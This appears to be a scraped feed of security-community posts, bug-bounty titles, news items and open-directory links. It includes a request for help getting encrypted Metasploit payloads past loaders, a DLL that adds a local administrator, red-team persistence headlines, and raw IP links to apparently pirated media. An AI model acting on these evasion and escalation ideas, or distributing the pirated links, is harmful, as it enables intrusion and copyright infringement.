    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s to some extent we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me in! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories. Physical security (login/logout time) Docs created on DMS (files opened, accessed, etc. Recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. Ldap - 389 What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads dont work with custom loaders
    Hello, im taking a course by Sektor7. i have the problem that, no matter in which way i try, i cant get a metasploit payload executed correctly by any loader (cpp) in the course. The program run, but there was no meterpreter session opened no more What I tried: Simple xor encryption and decryption Simple AES encryption and decryption Even base64 encoding doesnt work for me I also tried to research the root of the problem with no success. The source I used already was fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 the compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put in aes key and payload into the cpp, didnt work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didnt work. Note: Only the provided shellcodes by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions make them going broken during the cryption and compilation process? If yes, why and how to design the loaders they dont break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is to late to change path?
    Hi, I am a sysadmin from 8 years now i am thinking to change my career path in network & security. Because i see my colleagues in the security field and started to like more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “i know everything about you” and i thought he was just trolling. But then dude proceeded to say my name.He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should i be worried? Am i hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this manner, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non enterprise customers. While I appreciate model recommendations my curiousity is more about a discussion about brands / models that are positioned for non commercial envirnment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterpris market? Is there a brand that you will do almost anything to avoid? Is there model that should be crowned as the Bernie Madoff of firewalls? I am thinking about SOHO applicance box that Is below / around $200 Is not "compile OpenBSD on it and use VI to...." as close to set and forget as you dare Handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports) Netflix, Gmail etc etc needs to work without configuring every client Deal with 2-4 users that thinks "port" has something to do with ships VLAN capability Simple to use VPN like Wireguard Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. ​ Ideally things I'd like to be able to do: Have workflows based on CVSS eg scores of 7 and greater must be reviewed by X CVE comments Adjusted CVSS for local env mark/detect affected products/components jira integration Ingestion from qualys/other scanners etc Integration with threat intel Sort of like a CVE/vuln/risk specific ticketing system? ​ At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tool for Bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
    Summary: i discovered that i can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1.As a hacking or penteration testing. 2.use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aformentioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too hassle. Not to keen on bans and removals submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
    聚焦算法推荐乱象问题 构建算法安全治理体系 by ourren 好的工作想法从哪里来 by ourren 开源情报及其在下一代网络安全中的应用---文献综述 by ourren 商品图谱构建与实体对齐 by ourren 网络爬虫公司可能触犯哪些罪名 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-05 Review
    聚焦算法推荐乱象问题 构建算法安全治理体系 by ourren 好的工作想法从哪里来 by ourren 开源情报及其在下一代网络安全中的应用---文献综述 by ourren 商品图谱构建与实体对齐 by ourren 网络爬虫公司可能触犯哪些罪名 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward loose tracks of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

    浅析利用进程实现文件控制
    在《关于进程创建分析》一文中,对一些linux命令以及进程创建、进程状态做了讲解,还做了几个小lab。在本篇文章中,将继续延续上篇文章的知识,讲解一些文件操作指令并做一些小lab。  ( 1 min )
    国家网信办拟修订《移动互联网应用程序信息服务管理规定》
    2022年1月5日,国家互联网信息办公室对2016年8月1日正式施行的《移动互联网应用程序信息服务管理规定》进行了修订。
    FreeBuf 早报 | DatPiff 数据泄露影响数百万人;提高反诈意识,别让共享屏幕骗局得手
    国家互联网信息办公室拟对已施行的《移动互联网应用程序信息服务管理规定》进行了修订,现向社会公开征求意见。  ( 1 min )
    恶意软件Purple Fox 伪装成 Telegram 安装程序传播
    与其他恶意软件的传播方式不同,Purple Fox采用的新传播方式,使得其隐匿性进一步提高。  ( 1 min )
    盘点 2021 年严重的网络攻击事件
    盘点一下2021年全球部分实体遭受的网络攻击事件。  ( 1 min )
    你在看视频,黑客在窃取你的信用卡信息
    在此次供应链攻击事件中,Unit42安全团队总共发现了 100 多个受此攻击活动影响的房地产网站,这意味着攻击非常成功。  ( 1 min )
    美国无线运营商 UScellular批露了发生在年末的数据泄露事件
    美国最大的无线运营商之一——UScellular披露了一起发生在去年12月份的数据泄露事件。
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my ip is dynamic but it seems to change every long time, does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, Ipv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on Cloudfare server registered under a fake address, and's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applies to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything(which can be bypassed easily) and this is just a pain in the ass, no efficient at all considering it just makes workers being 100% dependent to IT for any requeriment So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    so i just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with application like zmap and zgrab, had a lot of fun joining random minecraft server, but i would like to explore a more practical, usefull you might say, approach. when i think of scanning the internet other than vulnerable DNS servers, i think about those looooong ass free proxy lists sitting there in the open. I know, i know those are not anonymous, but i was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, i'm trying to learn here (TL;DR) i want a proxy list, made by me, and im struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    i tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about c and the classic vulnerabilities that arise. Right now buffer overflows ​ So, just to sum up my understanding, an example like this will overflow because 'ab' is of two bytes is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows define them as follows: "while writing data) to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of a integer overflow (I use unsigned char for having most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current numbe, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost doesnt that go somewhere in memory? For that reason, my thought was that integer overflows had have to also contain buffer overflows. Is this true? ​ Further thoughts At the core of the issue is a question of what actually constitutes a buffer in c. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as buffers. is a int a buffer? is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old british tv stuff, mostly it would seem for kids. eg Paddinngton bear, but also dads army, one foot in the grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
    CodeAnalysis: 腾讯 Static Code Analysis by ourren 网络安全标准实践指南——网络数据分类分级指引 by ourren 扛住100亿次红包请求的后端架构设计 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-04 Review
    CodeAnalysis: 腾讯 Static Code Analysis by ourren 网络安全标准实践指南——网络数据分类分级指引 by ourren 扛住100亿次红包请求的后端架构设计 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    《网络安全审查办法》17项要点速读
    《网络安全审查办法》发布,这些要点请尽快了解。  ( 1 min )
    FreeBuf 早报 | 葡萄牙最大媒体集团遭勒索攻击;以色列媒体在苏莱曼尼遇害纪念日遭攻击
    全球动态1.以色列媒体在苏莱曼尼遇害周年纪念日遭到黑客攻击在伊朗伊斯兰革命卫队指挥官苏莱曼尼遇害周年纪念日,威胁行为者入侵了以色列媒体《耶路撒冷邮报》英文网站和《晚祷报》 (Maariv)的推特帐户。 [外刊-阅读原文]2.希腊黑客“攻陷”NASA局长社交账号美国宇航局(NASA)局长 Parimal Kopardekar 个人 Twitter 账户遭遇希腊黑客入侵。黑客组织的一位发言人称,此次把  ( 1 min )
    专访默安科技云舒:将安全融入开发,如春雨润物细无声
    云舒,默安科技联合创始人、CTO,16年以上安全从业经验、行业大V,欺骗防御理念的重要布道者。  ( 1 min )
    2021年最值得关注的五大安全话题:你关心的均有上榜
    这或许表明在新的工作方式趋于“常态化”后,外界更热衷于关注网络犯罪的创新。  ( 1 min )
    安全态势感知的前世今生
    安全态势感知的出现是国家安全战略发展的必然。  ( 1 min )
    DNS重绑定攻击研究
    每点击一个可疑的链接,DNS重绑定攻击除了利用存在DNS重绑定漏洞的应用外,甚至可能会导致攻击者瞬间控制你连接家庭网络的其它互联设备。  ( 1 min )
    Broward Health 披露影响 130 多万人的数据泄露事件
    值得注意的是,入侵点被确定为第三方医疗提供商,该提供商通过接入医疗系统提供服务,因此拥有一定的访问权限。  ( 1 min )
    2022年第一天,微软Exchange无法发送电子邮件
    新年伊始,万象更新,但在2022年的第一天,微软却给大家开了一个不大不小的“玩笑”。  ( 1 min )
    希腊黑客“攻陷”NASA局长社交账号
    美国宇航局(NASA)局长Parimal Kopardekar的Twitter账户遭遇希腊黑客入侵。  ( 1 min )
    应急响应之外联请求分析
    针对DNS恶意请求解析事件进行处理分析  ( 1 min )
    2021年流行勒索软件盘点
    2021年全球制造业、服务业、建筑、金融、能源、医疗、工控和政府组织机构等频遭勒索软件攻击,给全球产业产值造成严重损失。  ( 1 min )
    苹果iOS曝doorLock漏洞,能让手机“变砖”
    在Apple HomeKit 中发现了一个名为“doorLock”的新型持续拒绝服务漏洞,影响的系统版本从IOS14.7到IOS15.2。  ( 1 min )
    网信办等四部门发布《互联网信息服务算法推荐管理规定》
    《规定》明确“应用算法推荐技术”,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    十三部门修订发布《网络安全审查办法》,2022年2月15日施行
    《办法》明确掌握超过100万用户个人信息的网络平台运营者赴国外上市必须向网络安全审查办公室申报网络安全审查。
    2021勒索病毒大盘点
    勒索病毒为何有这么大的能量,让所有行业“谈虎色变”?面对勒索病毒,难道只能“躺平”?  ( 1 min )
    实战中的越权攻击总结
    本篇是对今年渗透测试遇到的越权攻击进行一下总结,各位师傅共同学习,若有不足或建议,也望大家及时提出。  ( 1 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds an user to the local Administrators group
    A simple C++ DLL that creates and add a user to the Local #Administrator group. Useful when dealing with privilege escalation on Windows to gain local administrator access and do not care of opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )

  • Open

    ASK: What should I look in a Masters Program before opting it
    Hey everyone, I have been thinking of pursuing a masters in cybersecurity. I love tinkering with low level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest me some good unis that I can apply too based on my inclination. PS: Can someone also take a look at my SOP, I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture off BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
